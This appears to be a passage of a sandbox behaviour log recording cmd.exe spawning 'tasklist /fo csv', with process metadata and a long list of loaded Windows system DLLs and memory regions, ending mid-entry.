[0571.871] UpdateProcThreadAttribute (in: lpAttributeList=0x28f4b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f468, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f4b8, lpPreviousValue=0x0) returned 1
[0571.871] GetStartupInfoW (in: lpStartupInfo=0x28f5d0 | out: lpStartupInfo=0x28f5d0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0571.871] GetProcessHeap () returned 0x50000
[0571.871] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x20) returned 0x647f0
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
[0571.871] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
[0571.872] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0571.873] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0571.874] GetProcessHeap () returned 0x50000
[0571.874] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x647f0 | out: hHeap=0x50000) returned 1
[0571.874] GetProcessHeap () returned 0x50000
[0571.874] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0x12) returned 0x68640
[0571.874] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1
[0571.876] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist /fo csv ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x28f4f0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="tasklist /fo csv ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f4a0 | out: lpCommandLine="tasklist /fo csv ", lpProcessInformation=0x28f4a0*(hProcess=0x5c, hThread=0x58, dwProcessId=0x9c, dwThreadId=0x528)) returned 1
[0571.889] CloseHandle (hObject=0x58) returned 1
[0571.889] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0571.889] GetProcessHeap () returned 0x50000
[0571.889] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x68f90 | out: hHeap=0x50000) returned 1
[0571.889] GetEnvironmentStringsW () returned 0x68f90*
[0571.890] GetProcessHeap () returned 0x50000
[0571.890] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0xb78) returned 0x6b610
[0571.890] memcpy (in: _Dst=0x6b610, _Src=0x68f90, _Size=0xb78 | out: _Dst=0x6b610) returned 0x6b610
[0571.890] FreeEnvironmentStringsW (penv=0x68f90) returned 1
[0571.890] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0xffffffff) returned 0x0
[0573.671] GetExitCodeProcess (in: hProcess=0x5c, lpExitCode=0x28f3e8 | out: lpExitCode=0x28f3e8*=0x0) returned 1
[0573.671] CloseHandle (hObject=0x5c) returned 1
[0573.671] _vsnwprintf (in: _Buffer=0x28f658, _BufferCount=0x13, _Format="%08X", _ArgList=0x28f3f8 | out: _Buffer="00000000") returned 8
[0573.671] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0573.671] GetProcessHeap () returned 0x50000
[0573.672] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x6b610 | out: hHeap=0x50000) returned 1
[0573.672] GetEnvironmentStringsW () returned 0x6cd40*
[0573.672] GetProcessHeap () returned 0x50000
[0573.672] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0xb9e) returned 0x6d8f0
[0573.672] memcpy (in: _Dst=0x6d8f0, _Src=0x6cd40, _Size=0xb9e | out: _Dst=0x6d8f0) returned 0x6d8f0
[0573.672] FreeEnvironmentStringsW (penv=0x6cd40) returned 1
[0573.672] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0573.672] GetProcessHeap () returned 0x50000
[0573.673] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x6d8f0 | out: hHeap=0x50000) returned 1
[0573.673] GetEnvironmentStringsW () returned 0x6cd40*
[0573.673] GetProcessHeap () returned 0x50000
[0573.673] RtlAllocateHeap (HeapHandle=0x50000, Flags=0x8, Size=0xb9e) returned 0x6d8f0
[0573.673] memcpy (in: _Dst=0x6d8f0, _Src=0x6cd40, _Size=0xb9e | out: _Dst=0x6d8f0) returned 0x6d8f0
[0573.673] FreeEnvironmentStringsW (penv=0x6cd40) returned 1
[0573.673] GetProcessHeap () returned 0x50000
[0573.673] HeapFree (in: hHeap=0x50000, dwFlags=0x0, lpMem=0x68640 | out: hHeap=0x50000) returned 1
[0573.673] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f4b8 | out: lpAttributeList=0x28f4b8)
[0573.673] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0573.675] _close (_FileHandle=3) returned 0
[0573.676] _get_osfhandle (_FileHandle=1) returned 0x7
[0573.676] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0573.676] _get_osfhandle (_FileHandle=1) returned 0x7
[0573.676] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8ae194 | out: lpMode=0x4a8ae194) returned 1
[0573.677] _get_osfhandle (_FileHandle=0) returned 0x3
[0573.677] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8ae198 | out: lpMode=0x4a8ae198) returned 1
[0573.677] SetConsoleInputExeNameW () returned 0x1
[0573.677] GetConsoleOutputCP () returned 0x1b5
[0573.677] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8bbfe0 | out: lpCPInfo=0x4a8bbfe0) returned 1
[0573.677] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0573.678] exit (_Code=0)
Process:
id = "36"
image_name = "tasklist.exe"
filename = "c:\\windows\\system32\\tasklist.exe"
page_root = "0x645d1000"
os_pid = "0x9c"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "35"
os_parent_pid = "0x3f8"
cmd_line = "tasklist /fo csv "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 5249
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 5250
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 5251
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 5252
start_va = 0x110000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 5253
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 5254
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 5255
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 5256
start_va = 0xff980000
end_va = 0xff99dfff
monitored = 0
entry_point = 0xff9936e4
region_type = mapped_file
name = "tasklist.exe"
filename = "\\Windows\\System32\\tasklist.exe" (normalized: "c:\\windows\\system32\\tasklist.exe")
Region:
id = 5257
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 5258
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 5259
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 5260
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 5261
start_va = 0x190000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 5262
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 5263
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 5264
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 5265
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 5266
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 5267
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 5268
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5276
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 5277
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5278
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 5279
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 5280
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5281
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5282
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5283
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5284
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 5285
start_va = 0x7fefcd40000
end_va = 0x7fefcd4bfff
monitored = 0
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 5286
start_va = 0x7fefb560000
end_va = 0x7fefb577fff
monitored = 0
entry_point = 0x7fefb561010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 5287
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 5288
start_va = 0x7fefda10000
end_va = 0x7fefda1afff
monitored = 0
entry_point = 0x7fefda11030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 5289
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 5290
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 5291
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 5292
start_va = 0x7fef5b50000
end_va = 0x7fef5b92fff
monitored = 0
entry_point = 0x7fef5b71b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 5293
start_va = 0x7fefbdd0000
end_va = 0x7fefbde5fff
monitored = 0
entry_point = 0x7fefbdd11a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 5294
start_va = 0x7fefbdc0000
end_va = 0x7fefbdcbfff
monitored = 0
entry_point = 0x7fefbdc18a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 5295
start_va = 0x7fefd970000
end_va = 0x7fefd992fff
monitored = 0
entry_point = 0x7fefd971198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 5296
start_va = 0x7fefbda0000
end_va = 0x7fefbdb4fff
monitored = 0
entry_point = 0x7fefbda1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 5297
start_va = 0x7fef85b0000
end_va = 0x7fef86d4fff
monitored = 0
entry_point = 0x7fef8601570
region_type = mapped_file
name = "dbghelp.dll"
filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll")
Region:
id = 5298
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 5299
start_va = 0x390000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 5300
start_va = 0x190000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 5301
start_va = 0x290000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 5302
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5303
start_va = 0x4a0000
end_va = 0x627fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004a0000"
filename = ""
Region:
id = 5304
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5305
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5306
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5307
start_va = 0x630000
end_va = 0x7b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000630000"
filename = ""
Region:
id = 5308
start_va = 0x7c0000
end_va = 0x1bbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007c0000"
filename = ""
Region:
id = 5309
start_va = 0xc0000
end_va = 0xc3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tasklist.exe.mui"
filename = "\\Windows\\System32\\en-US\\tasklist.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\tasklist.exe.mui")
Region:
id = 5313
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 5314
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 5315
start_va = 0x1bc0000
end_va = 0x1ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bc0000"
filename = ""
Region:
id = 5316
start_va = 0x390000
end_va = 0x44ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 5317
start_va = 0x490000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 5318
start_va = 0x1bc0000
end_va = 0x1c3cfff
monitored = 0
entry_point = 0x1bccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 5319
start_va = 0x1c50000
end_va = 0x1ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c50000"
filename = ""
Region:
id = 5320
start_va = 0x1bc0000
end_va = 0x1c3cfff
monitored = 0
entry_point = 0x1bccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 5321
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 5332
start_va = 0x1dd0000
end_va = 0x1e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001dd0000"
filename = ""
Region:
id = 5333
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 5334
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 5335
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 5336
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 5337
start_va = 0x7fef8880000
end_va = 0x7fef888dfff
monitored = 0
entry_point = 0x7fef8885500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 5338
start_va = 0x7fefa260000
end_va = 0x7fefa2d6fff
monitored = 0
entry_point = 0x7fefa29e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 5339
start_va = 0x7fefd5e0000
end_va = 0x7fefd601fff
monitored = 0
entry_point = 0x7fefd5e5d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 5340
start_va = 0x7fefdb20000
end_va = 0x7fefdb5cfff
monitored = 0
entry_point = 0x7fefdb218f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 5341
start_va = 0x1e50000
end_va = 0x211efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 5345
start_va = 0x21b0000
end_va = 0x222ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021b0000"
filename = ""
Region:
id = 5346
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 5347
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 5348
start_va = 0x1bc0000
end_va = 0x1c04fff
monitored = 0
entry_point = 0x1bc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5349
start_va = 0x1bc0000
end_va = 0x1c04fff
monitored = 0
entry_point = 0x1bc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5350
start_va = 0x1bc0000
end_va = 0x1c04fff
monitored = 0
entry_point = 0x1bc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5351
start_va = 0x1bc0000
end_va = 0x1c04fff
monitored = 0
entry_point = 0x1bc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5352
start_va = 0x1bc0000
end_va = 0x1c04fff
monitored = 0
entry_point = 0x1bc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5353
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 5354
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
